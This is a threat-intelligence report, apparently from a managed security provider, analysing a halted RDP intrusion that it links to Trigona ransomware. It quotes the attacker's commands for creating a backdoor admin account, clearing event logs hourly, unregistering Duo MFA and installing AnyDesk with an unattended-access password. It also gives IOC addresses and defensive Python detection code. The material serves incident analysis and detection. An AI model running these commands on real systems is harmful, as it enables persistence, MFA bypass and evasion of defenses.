Possible Trigona Ransomware Appearance
A possible Trigona ransomware reappearance is analyzed and summarized below through the lens of an unusual intrusion that DeepSeas observed while serving one of its clients.
When a web server with exposed RDP access was found to have been brute forced, the DeepSeas cyber threat intelligence crew believed the actor may have been trying to deliver and execute Trigona ransomware. After gaining initial access, the intruder performed many malicious actions in the client's environment, including establishing persistence, escalating privileges, evading defenses, performing asset discovery, conducting lateral movement, collecting data, and more. Upon review of the intruder's activities, DeepSeas noted that some of the tactics, techniques, and procedures (TTPs) matched previously observed TTPs associated with the actor responsible for the Trigona ransomware.
As the attack was halted before any ransomware activity, DeepSeas was unable to obtain the intruder's final payload for analysis, which prevents concrete attribution of this attack to the Trigona ransomware actor. DeepSeas therefore cannot rule out that this incident was the work of a new or different actor simply using Trigona ransomware or copying its tactics. Regardless, DeepSeas is presenting these findings in the hope that other organizations may find this analysis useful in identifying and blocking further activity by this actor.
About Trigona Ransomware
Trigona ransomware first appeared in June 2022, with the group behind the ransomware simply going by the uninspired moniker “Trigona ransomware group.” The group’s operations were typical of most ransomware group operations – extorting victims indiscriminately, mostly large organizations in the technology, healthcare, finance, manufacturing, and retail sectors. They also cast a wide geographic net, with many victims located in the United States, India, Israel, Turkey, Brazil, and Italy.
After executing their ransomware, the Trigona ransom note required victims to enter a unique key into the group's website to obtain further instructions. This key was used to access a payment portal hosted on the Tor network, where the group demanded payment in cryptocurrency, specifically Monero (XMR), to obtain the decryption key. The group also hosted an extortion blog on the dark web named Trigona Leaks. This blog was used to publicly display victim data to induce fear in victims, demonstrating that the group had exfiltrated data and driving home the point that the Trigona ransomware group was not a run-of-the-mill criminal group attempting to use previously leaked data to extort victims.
The group was in full operation until October 2023, when user @vx_herm1t on X (formerly Twitter) announced the takedown of its infrastructure, including all of its servers and its dark web blog. In addition to this vigilante takedown, the X user also exfiltrated all of the group's data they could obtain, which was likely provided to law enforcement. Researchers observed almost no activity from the Trigona group following this incident, and the group was believed to be completely disabled. Research conducted by DeepSeas also supports this conclusion, finding users in dark web crime forums pointing out as early as July 2023 that Trigona had stopped operating. One poster said, "Trigona isn't working. Therefore, they are not accepting new partners for now."
Actions on Objective
During the DeepSeas investigation, internal analysts developed a chronological timeline of events to understand the actions on objective undertaken by the intruder. On July 27, 2024, after repeated failed password-guessing attempts, an unauthorized user geolocated to Germany made a successful remote desktop protocol (RDP) connection to the client's web server. On July 28, the attacker logged on to the brute-forced admin account and loitered there until July 29.
At approximately 0230 UTC on July 29, the attacker made their first hands-on moves. First, the attacker ran a batch file called !newuser.bat, which used the native Windows program net.exe to create a new account named ITadmin, both as a local account on the web server and as a domain account (the /domain form of the command is processed by a domain controller). The same script then granted the account administrator membership locally and in the domain, and added it to the local Remote Desktop Users group so that it could log on over RDP. This gave the attacker an administrative identity of their own that was valid on the server and across the client's domain.
net user ITadmin ZXCzxc123!!! /add
net user ITadmin ZXCzxc123!!! /add /domain
Next, the batch script used net.exe to add the ITadmin account to the built-in Administrators group under several localized names (English, Spanish, French, and German), both locally and in the domain. Trying every spelling lets the script work regardless of the Windows display language: only the name matching the installed language succeeds, and the others fail harmlessly. The account was then added to the Remote Desktop Users group and explicitly activated.
net localgroup Administrators ITadmin /add
net localgroup administradores ITadmin /add
net localgroup Administrateurs ITadmin /add
net localgroup Administratoren ITadmin /add
net localgroup Administrators ITadmin /add /domain
net localgroup administradores ITadmin /add /domain
net localgroup Administrateurs ITadmin /add /domain
net localgroup Administratoren ITadmin /add /domain
net localgroup "Remote Desktop Users" ITadmin /add
net user ITadmin /active:yes
Once the ITadmin account had been created and granted these permissions, the attacker set the DontDisplayLastUserName policy value, which stops the Windows logon screen from showing the name of the last user who signed in. This does not erase any record of the account's creation; it merely reduces the chance that someone at the console would notice ITadmin on the login screen and raise an alarm. The account remains visible in Local Users and Groups, and its creation is still recorded as Security event 4720 unless the logs are cleared.
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\policies\system" /v dontdisplaylastusername /t REG_DWORD /d 1 /f
The attacker also created a scheduled task, running as SYSTEM, to clear all Windows event logs once every hour. Two caveats matter for defenders here: Get-EventLog and Clear-EventLog operate only on the classic event logs (Application, Security, System and similar), not on the newer Applications and Services channels such as Sysmon or PowerShell Operational, and every clearing of the Security log writes event 1102 as its first new entry, so the wipe itself leaves a reliable detection hook.
schtasks /create /ru "NT AUTHORITY\SYSTEM" /tn "Events" /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }" /sc HOURLY /f
Next, the attacker disabled the client's multi-factor authentication (MFA) for Windows logon by using the native Windows regsvr32.exe program to unregister the Duo credential provider and credential provider filter DLLs. Once these COM registrations are removed, the Windows logon process, including RDP logons, no longer loads the Duo prompt. The script tried two candidate install directories so that it would work whichever one was present.
regsvr32 /u "C:\Program Files\Duo Security\WindowsLogon\DuoCredProv.dll"
regsvr32 /u "C:\Program Files\Duo Security\WindowsLogon\DuoCredFilter.dll"
regsvr32 /u "C:\Program Files\Duo Security\DuoCredProv\DuoCredProv.dll"
regsvr32 /u "C:\Program Files\Duo Security\DuoCredProv\DuoCredFilter.dll"
AnyDesk, a well-known remote desktop application, was then installed through a script named any.bat. The script installed AnyDesk under c:\windows\anydesk as a service that starts with Windows, silently and with updates disabled, and then set an unattended-access password by piping the password from echo into anydesk.exe --set-password, so the attacker could reconnect without anyone accepting the session. Later, inbound remote sessions through this AnyDesk instance were detected, with the program communicating with IP addresses in the United States, Russia, and Bulgaria (AnyDesk sessions normally traverse AnyDesk's own relay network, so these addresses are not necessarily the operator's).
"C:\Windows\System32\cmd.exe" /C "C:\Users\ITadmin\Desktop\Any.bat"
any.exe --install c:\windows\anydesk --start-with-win --silent --update-disabled
c:\windows\anydesk\anydesk.exe --start-service
C:\Windows\system32\cmd.exe /S /D /c" echo ZAZA123!@# "
c:\windows\anydesk\anydesk.exe --set-password
Following these actions, a suite of malicious tools was imported into a new folder named C:\temp\net_scan_new_noPS\. Numerous files were dropped inside this folder, many of which were never invoked by the attacker, suggesting that the attacker simply imported a pre-established toolkit for use in follow-on activity. A list of these files is below.
- c:\temp\net_scan_new_nops\libsmb2.dll
- c:\temp\net_scan_new_nops\libsmi2.dll
- c:\temp\net_scan_new_nops\netscan.exe
- c:\temp\net_scan_new_nops\netscan.lic
- c:\temp\net_scan_new_nops\netscan.xml
- c:\temp\net_scan_new_nops\opt
- c:\temp\net_scan_new_nops\opt\openrdp.bat
- c:\temp\net_scan_new_nops\opt\psexec.exe
- c:\temp\net_scan_new_nops\opt\shutdown.bat
- c:\temp\net_scan_new_nops\opt\vm_off.bat
- c:\temp\net_scan_new_nops\oui.txt
Then, using the uploaded network scanner running out of the C:\temp\net_scan_new_noPS directory, the attacker mapped the client's entire network infrastructure for discovery purposes, most likely in preparation for pivoting through the client's environment. This was the final activity seen in this attack; further actions were blocked and the attack was terminated after 0139 UTC on July 30, 2024.
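The chain from the !newuser.bat account creation through the netscan.exe run is a sequence a defender can hunt for as a whole rather than one command at a time. The following Python is an added example written for this article, not DeepSeas tooling or code recovered from the incident: it applies one rule per stage to a constructed, simplified stream of Windows Security/Sysmon-style events (process command lines plus the 4720, 4732, 4698 and 1102 events the chain leaves behind) and flags a host only when several stages fire, so that a lone account creation on another host is not an alert. The event field names, host names and sample records are assumptions made for the example.

```python
"""Hunt for the ITadmin persistence chain over constructed Windows telemetry.

Simplified event records (assumed field names, constructed for this example):
  4688 / Sysmon 1 : process creation, "cmd" holds the command line
  4720            : local user account created ("target")
  4732            : member added to a security-enabled local group ("group", "target")
  4698            : scheduled task created ("task")
  1102            : the Security log was cleared
"""
import re
from collections import defaultdict

# Localized names of the built-in Administrators group that the batch script tried.
ADMIN_GROUP_NAMES = {"administrators", "administradores", "administrateurs", "administratoren"}
_ADMIN_ALT = "|".join(sorted(ADMIN_GROUP_NAMES))

# One command-line rule per stage. re.I because net.exe and reg.exe are case-insensitive.
CMDLINE_RULES = {
    "net_user_add":         re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I),
    "net_localgroup_admin": re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+\"?(?:" + _ADMIN_ALT + r")\"?\s+\S+\s+/add\b", re.I),
    "net_localgroup_rdp":   re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+\"?Remote Desktop Users\"?\s+\S+\s+/add\b", re.I),
    "hide_last_user":       re.compile(r"\breg(?:\.exe)?\s+add\b.*\bdontdisplaylastusername\b.*/d\s+1\b", re.I),
    "hourly_log_wipe":      re.compile(r"\bschtasks(?:\.exe)?\s+/create\b.*clear-eventlog.*/sc\s+hourly\b", re.I),
    "credprov_unregister":  re.compile(r"\bregsvr32(?:\.exe)?\s+(?:/s\s+)?/u\b.*\bDuoCred(?:Prov|Filter)\.dll", re.I),
    "anydesk_install":      re.compile(r"--install\s+\S+.*--start-with-win\b", re.I),
    "anydesk_set_password": re.compile(r"\banydesk(?:\.exe)?\s+--set-password\b", re.I),
    "netscan_run":          re.compile(r"\\net_scan_new_nops\\netscan\.exe\b", re.I),
}


def hunt(events):
    """Return {host: {stage: [evidence, ...]}} for every stage observed on each host."""
    hits = defaultdict(lambda: defaultdict(list))
    for ev in events:
        host, eid, cmd = ev["host"], ev["id"], ev.get("cmd", "")
        if eid == 4688 and cmd:
            for stage, rule in CMDLINE_RULES.items():
                if rule.search(cmd):
                    hits[host][stage].append(cmd)
        elif eid == 4720:
            hits[host]["account_created"].append(ev["target"])
        elif eid == 4732 and ev["group"].lower() in ADMIN_GROUP_NAMES:
            hits[host]["admin_member_added"].append(ev["target"] + " -> " + ev["group"])
        elif eid == 4698:
            hits[host]["scheduled_task_created"].append(ev["task"])
        elif eid == 1102:
            # The log wipe writes 1102 as the first entry of the freshly cleared Security log.
            hits[host]["security_log_cleared"].append(ev.get("user", ""))
    return {h: dict(stages) for h, stages in hits.items()}


def triage(events, min_stages=3):
    """[(host, sorted stage names)] for hosts with at least min_stages distinct stages, most first."""
    flagged = [(h, sorted(s)) for h, s in hunt(events).items() if len(s) >= min_stages]
    return sorted(flagged, key=lambda hs: -len(hs[1]))


def _proc(cmd, user="ITadmin", host="WEB01"):
    """Constructed process-creation event (4688 / Sysmon 1)."""
    return {"id": 4688, "host": host, "user": user, "cmd": cmd}


SAMPLE_EVENTS = [  # constructed to mirror the chain above; not real client telemetry
    _proc(r"cmd.exe /c C:\Users\admin\Desktop\!newuser.bat", user="admin"),
    _proc("net user ITadmin ZXCzxc123!!! /add", user="admin"),
    _proc("net user ITadmin ZXCzxc123!!! /add /domain", user="admin"),
    {"id": 4720, "host": "WEB01", "user": "admin", "target": "ITadmin"},
    _proc("net localgroup Administratoren ITadmin /add", user="admin"),
    _proc('net localgroup "Remote Desktop Users" ITadmin /add', user="admin"),
    {"id": 4732, "host": "WEB01", "user": "admin", "group": "Administrators", "target": "ITadmin"},
    _proc(r'reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\policies\system" /v dontdisplaylastusername /t REG_DWORD /d 1 /f'),
    _proc(r'schtasks /create /ru "NT AUTHORITY\SYSTEM" /tn "Events" /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }" /sc HOURLY /f'),
    {"id": 4698, "host": "WEB01", "user": "ITadmin", "task": r"\Events"},
    {"id": 1102, "host": "WEB01", "user": "SYSTEM"},
    _proc(r'regsvr32 /u "C:\Program Files\Duo Security\WindowsLogon\DuoCredProv.dll"'),
    _proc(r"any.exe --install c:\windows\anydesk --start-with-win --silent --update-disabled"),
    _proc(r'C:\Windows\system32\cmd.exe /S /D /c" echo ZAZA123!@# "'),
    _proc(r"c:\windows\anydesk\anydesk.exe --set-password"),
    _proc(r"c:\temp\net_scan_new_noPS\netscan.exe"),
    # Benign administration on another host: listing a group and enabling a user are not additions.
    _proc("net localgroup Administrators /domain", user="svc_backup", host="FS02"),
    _proc("net user jsmith /active:yes", user="helpdesk", host="FS02"),
    {"id": 4720, "host": "FS02", "user": "helpdesk", "target": "jsmith"},
]

if __name__ == "__main__":
    for host, stages in triage(SAMPLE_EVENTS):
        print(host, len(stages), "stages:", ", ".join(stages))
```

The threshold in triage is the point of the exercise: each rule on its own (a net user /add, a reg add, an AnyDesk install) is noisy in a real estate, but several of them firing on one host within a short span is the signature of this playbook, and the 4732 and 1102 events give corroboration from the audit log even if the process-creation telemetry is incomplete.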
Observed Tactics Hint at Trigona Ransomware Link
In the context of the above activity, DeepSeas analysts noticed several overlaps between the actions taken in this incident and previous Trigona ransomware activity. These include the use of the SoftPerfect Network Scanner tool, listed as netscan.exe in the file list above; the openrdp.bat tool, also known as the "Remote Desktop Plus" RDP client; and newuser.bat, which in both this case and previous Trigona ransomware cases was used to retrieve the Local Administrators group and Remote Desktop Users group names via WMIC. All of these matching TTPs were documented in a 2023 DFIR Report, along with other commonalities such as the threat actor gaining initial access through an exposed RDP server, the use of similar discovery tools, and more.
The number of coincidences between previously observed Trigona ransomware actor activity and the activity observed by DeepSeas is sufficient to suggest that the individual or team responsible for previous Trigona ransomware activity has either resumed operations or, following the compromise of their infrastructure in 2023, sold their ransomware, toolset, and playbooks to another actor. DeepSeas analysts view the former as the more likely option: even when a group shuts down and sells its operation, the new operators usually change the malware, tools, and tactics to suit their own workflows. DeepSeas analysts cannot rule out the possibility of an independent actor copying Trigona tactics; however, the actions on objective, their sequence, and their timing, while slower than in previously observed Trigona incidents, are suggestive of the group's involvement in some form.
Fortunately, the attackers never got the chance to deliver a final payload or exfiltrate data, as the attack was detected and stopped before the attackers could do any damage. The Trigona ransomware group and many other ransomware groups often do not deliver the ransomware binary before laying the groundwork and clearing the way for the cryptor to execute freely. As the attack was stopped before this point, it is impossible to conclude with 100% certainty that the Trigona ransomware actors were responsible for this intrusion, though DeepSeas analysts conclude that Trigona’s tactics are the best fit for the observed activity.
DeepSeas Response and Indicators of Compromise
This attack was detected and blocked by DeepSeas MDR before any data loss or encryption could occur. Upon detection, DeepSeas analysts were in close contact with the client, who helpfully provided context and other information that was critical to a quick resolution. The attacker’s access was cut off, passwords were rotated, and multifactor authentication keys were rotated to ensure that the attacker no longer had any access to the client’s environment. Uniquely, the client’s Administrator credentials had been placed on an hourly rotation, and this is likely what led to the attackers establishing their own administrator account, complicating their operations and slowing them down. Previous Trigona ransomware incidents have taken approximately 2.5 hours from compromise to ransomware execution. If indeed this incident was the work of Trigona resurgent, they found this client a difficult nut to crack and ultimately wasted two to three days of operational time for no monetary gain.
The following indicators of compromise (IOCs) are related to this incident. Threat hunters should search for the following IPv4 addresses in network and Windows event logs to ensure that RDP brute forcing and use of remote desktop software are not present in their environments.
Type | Value | Notes
--- | --- | ---
IPv4 Address | 88.214.25[.]19 | IPv4 address used by the presumed Trigona ransomware actors to conduct brute force attacks against RDP.
IPv4 Address | 85.215.192[.]231 | IPv4 address used by the presumed Trigona ransomware actors after successfully brute-forcing RDP access.
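To make the IOCs and the brute-force-then-logon pattern from this incident searchable, the following Python is an added example (not DeepSeas tooling) that detects a burst of failed logons from one source address, then a subsequent interactive RDP success on the same host even when the session comes from a different address, as it did here, and counts sightings of the two IOC addresses. The logon records and their field names are constructed for the example; the addresses are the ones from the table above.

```python
"""Brute force followed by an interactive RDP logon, over constructed Security-log records."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Addresses from the IOC table above.
IOC_IPS = {"88.214.25.19", "85.215.192.231"}


def _logon(ts, event_id, host, user, src_ip, logon_type):
    """Constructed Security-log logon record (4624 success / 4625 failure); assumed field names."""
    return {"ts": ts, "id": event_id, "host": host, "user": user, "src_ip": src_ip, "logon_type": logon_type}


_T0 = datetime(2024, 7, 27, 1, 0, 0)
SAMPLE_EVENTS = (
    # Twelve failures in four minutes from one source: the password-guessing burst.
    # With NLA enabled, failed RDP attempts are logged with logon type 3 rather than 10.
    [_logon((_T0 + timedelta(seconds=20 * i)).isoformat(), 4625, "WEB01", "administrator", "88.214.25.19", 3)
     for i in range(12)]
    + [
        _logon("2024-07-27T00:40:00", 4625, "WEB01", "jsmith", "10.0.0.5", 10),  # a user mistyping a password
        _logon("2024-07-27T00:41:00", 4625, "WEB01", "jsmith", "10.0.0.5", 10),
        _logon("2024-07-27T01:10:00", 4624, "WEB01", "administrator", "85.215.192.231", 10),  # interactive RDP session
        _logon("2024-07-27T09:00:00", 4624, "FS02", "jsmith", "10.0.0.9", 10),  # unrelated normal logon
    ]
)


def bruteforce_bursts(events, threshold=10, window=timedelta(minutes=10)):
    """{(host, src_ip): time the burst was first detected} for sources producing at least
    `threshold` failed network or RDP logons inside a sliding `window`."""
    bursts, recent = {}, defaultdict(deque)
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["id"] != 4625 or ev["logon_type"] not in (3, 10):
            continue
        key, t = (ev["host"], ev["src_ip"]), datetime.fromisoformat(ev["ts"])
        q = recent[key]
        q.append(t)
        while t - q[0] > window:  # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in bursts:
            bursts[key] = t
    return bursts


def success_after_burst(events, bursts, lookahead=timedelta(days=2)):
    """Interactive RDP successes (4624, logon type 10) on a host within `lookahead` of a burst.
    The source address is deliberately not required to match the burst: in this incident the
    guessing and the later session came from different addresses."""
    burst_by_host = defaultdict(list)
    for (host, ip), t in bursts.items():
        burst_by_host[host].append((t, ip))
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["id"] != 4624 or ev["logon_type"] != 10:
            continue
        t = datetime.fromisoformat(ev["ts"])
        for bt, bip in burst_by_host.get(ev["host"], []):
            if bt <= t <= bt + lookahead:
                alerts.append({"host": ev["host"], "user": ev["user"], "when": ev["ts"],
                               "success_ip": ev["src_ip"], "bruteforce_ip": bip,
                               "ioc_match": ev["src_ip"] in IOC_IPS or bip in IOC_IPS})
    return alerts


def ioc_sightings(events):
    """How many logon events each IOC address appears in."""
    counts = defaultdict(int)
    for ev in events:
        if ev["src_ip"] in IOC_IPS:
            counts[ev["src_ip"]] += 1
    return dict(counts)


if __name__ == "__main__":
    bursts = bruteforce_bursts(SAMPLE_EVENTS)
    for alert in success_after_burst(SAMPLE_EVENTS, bursts):
        print(alert)
    print(ioc_sightings(SAMPLE_EVENTS))
```

Two design points carry over to production queries. Failed RDP logons show up as logon type 3 on hosts with Network Level Authentication enabled, so a rule that only watches type 10 failures misses the guessing phase entirely; and correlating the success by host rather than by source address is what catches the pattern seen here, where the session that followed the brute force came from a second address.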
Possible Trigona Ransomware Conclusion
The activity in this report suggests that, despite the reported decline of the Trigona ransomware group, the group or some of its members may still be active. The available evidence hints at the Trigona ransomware group's involvement, but no conclusive proof is available at this time because the attack was stopped before further actions could be undertaken. DeepSeas analysts believe that, whether or not the attack was carried out by this group, a successfully blocked attack is infinitely preferable to whatever intelligence might be gained from permitting an attacker to operate freely.
Whether the Trigona group has begun to make a reappearance or another group or individual is attempting to capitalize on the work they left behind, it is always important to continue to monitor and protect against threats of ransomware, despite the age of the ransomware or group in question. If not for the quick actions by DeepSeas security analysts against this threat, an organization may have been ransomed. We invite you to follow and support DeepSeas as we continue to publish our findings for the cybersecurity community.